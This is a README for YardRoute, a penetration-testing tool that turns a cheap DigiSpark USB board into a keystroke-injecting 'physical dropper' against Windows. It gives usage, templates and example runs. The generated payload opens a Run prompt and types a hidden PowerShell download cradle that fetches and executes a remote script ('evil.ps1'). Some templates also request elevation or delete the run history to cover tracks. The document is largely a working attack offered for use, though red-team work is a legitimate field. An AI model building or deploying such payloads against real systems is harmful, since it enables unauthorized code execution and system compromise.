YardRoute
=========

### About
YardRoute is a project that automates the installation and configuration of Arduino sketches for the DigiSpark Attiny85, both for the original and for clones.

It is oriented at Penetration Testers, Red Teamers etc. and it creates a very cheap rubber ducky "physical dropper" to attack Windows systems.

![](digispark.jpg)

### How does it work?
The script accepts a few commandline arguments to create an emulated keyboard out of the DigiSpark, as to open a Run Prompt with CTRL+R and write out a PowerShell download cradle (i.e. DownloadString).

It can also create an emulated mouse device to act as a Mouse Jiggler and prevent screen lock by moving the mouse every 50ms for 3px in the shape of a square.

### Firmware upgrade
The default DigiSpark firmware installed on most DigiSparks has a 5 second programming delay. This is useless if using for Red Teaming engagements, where the payload should be executed ASAP.

As such, this repository also contains a directory called "firmware_upgrade" along with an automated script that downloads the latest version of micronucleus and a custom hex firmware for the DigiSpark that eliminates this 5 second delay.

The entire firmware upgrade process should be fully automated.

However, for future DigiSpark programming with the new firmware, the GND and Pin 5 (or PB0) must be shorted with a 0Ohm resistor (e.g. with a jumper wire).

Otherwise, as soon as the DigiSpark is plugged into a USB port the payload will execute.

The following picture describes the DigiSpark pinout:

![](digispark_pinout.png)

### Usage

    ./yardroute.sh [-u <url>] [-c <cmd>] [-t <template>] [-p] [-l] [-i]

    -t <tmpl>   The template used to construct the emulated keyboard behaviour. Mandatory option. A few options are available, both for ease of use and for moderately stealthy use:
        run.tmpl              Use the ALT+R key combination to open a Run Prompt and type the download cradle
        run-clear.tmpl        Use the ALT+R key combination to open a Run Prompt, type the download cradle and delete the run history Registry Key
        run-admin.tmpl        Use the ALT+R key combination to open a Run Prompt, type the download cradle and run it with the CTRL+SHIFT+ENTER key combination for elevation
        run-clear-admin.tmpl  Use the ALT+R key combination to open a Run Prompt, type the download cradle, run it with the CTRL+SHIFT+ENTER key combination for elevation and delete the run history Registry Key
        mouse-jiggler.tmpl    Use a Mouse Jiggler template that moves the mouse every 50ms in the shape of a square

    -u <url>    URL that points to a a PowerShell script that gets reflectively invoked, e.g. http(s)://10.10.12.3/evil.ps1. Mutually exclusive with "-c". Can be used alongside "-p"
    -c <cmd>    Custom PowerShell command, will get appended to a "powershell -nop -noni -ep bypass -w 2 -c %s" command. Mutually exclusive with "-u"

    -p  Upon supplying this argument alongside "-u", a proxy-aware PowerShell download cradle is used during template generation
    -l  List the available sktech templates
    -i  Automated installation of the Arduino IDE (v1.8.13), configuration of the Board Manager and installation of a udev rule to not require root privileges
    -h  Display a help and usage message

### Examples

Using a run as admin template with an arbitrary URL hosting a PowerShell script

    ./yardroute.sh -u http://10.10.12.3/evil.ps1 -t run-admin.tmpl -p

    [*] Using proxy-aware PowerShell download cradle
    [*] Using the run-admin.tmpl template
    [+] Saved .ino template and payload as yardroute-20-11-06_215539/yardroute-20-11-06_215539.ino

    Picked up JAVA_TOOL_OPTIONS:
    Loading configuration...
    Initializing packages...
    Preparing boards...
    Verifying...
    Sketch uses 3224 bytes (53%) of program storage space. Maximum is 6012 bytes.
    Global variables use 294 bytes of dynamic memory.
    Uploading...
    Running Digispark Uploader...
    Plug in device now... (will timeout in 60 seconds)

The final payload will be

    powershell -nop -noni -ep bypass -w 2 -c $b=New-Object System.Net.WebClient;$b.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;iex $b.DownloadString('http://10.10.12.3/evil.ps1')

Using a run as admin template with a custom PowerShell command

    ./yardroute.sh -t run-admin.tmpl -c "Write-Host Hello world!"
    [*] Using the run-admin.tmpl template
    [+] Saved .ino template and payload as yardroute-20-11-07_204946/yardroute-20-11-07_204946.ino

    Picked up JAVA_TOOL_OPTIONS:
    Loading configuration...
    Initializing packages...
    Preparing boards...
    Verifying...
    Sketch uses 3084 bytes (51%) of program storage space. Maximum is 6012 bytes.
    Global variables use 154 bytes of dynamic memory.
    Uploading...
    Running Digispark Uploader...
    Plug in device now... (will timeout in 60 seconds)

The final payload will be

    powershell -nop -noni -ep bypass -w 2 -c Write-Host Hello world!

### Misc
Tested with (I think) an original DigiSpark and cheap chinese clones, all working.

### NOTES
If there are any issues with the upload process, there might be an incompatiblity between the DigiSpark version used and the micronucleus version shipped with Arduino IDE.

The latest micronucleus version can be found at https://github.com/micronucleus/micronucleus.

It can be compiled using make, then later copied to $HOME/.arduino15/packages/digistump/tools/micronucleus/<version>/micronucleus

### Requirements
None.

